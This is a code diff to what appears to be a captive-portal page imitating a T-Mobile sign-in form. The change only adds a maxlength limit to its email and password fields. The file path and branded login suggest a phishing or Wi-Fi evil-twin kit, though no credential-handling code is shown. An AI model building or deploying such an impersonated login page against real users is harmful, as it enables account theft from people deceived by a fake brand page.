--- a/portals/isp/T_Mobile.html
+++ b/portals/isp/T_Mobile.html
@@ -103,8 +103,8 @@
     <h2>Use your T-Mobile account</h2>
 
     <form id="loginForm">
-      <input type="text" id="email" name="email" placeholder="Email or phone number" required>
-      <input type="password" id="password" name="password" placeholder="Password" required>
+      <input type="text" id="email" name="email" placeholder="Email or phone number" maxlength="100" required>
+      <input type="password" id="password" name="password" placeholder="Password" maxlength="100" required>
       <input type="submit" value="Sign In">
     </form>
     <div id="errorMessage" class="error-message"></div>
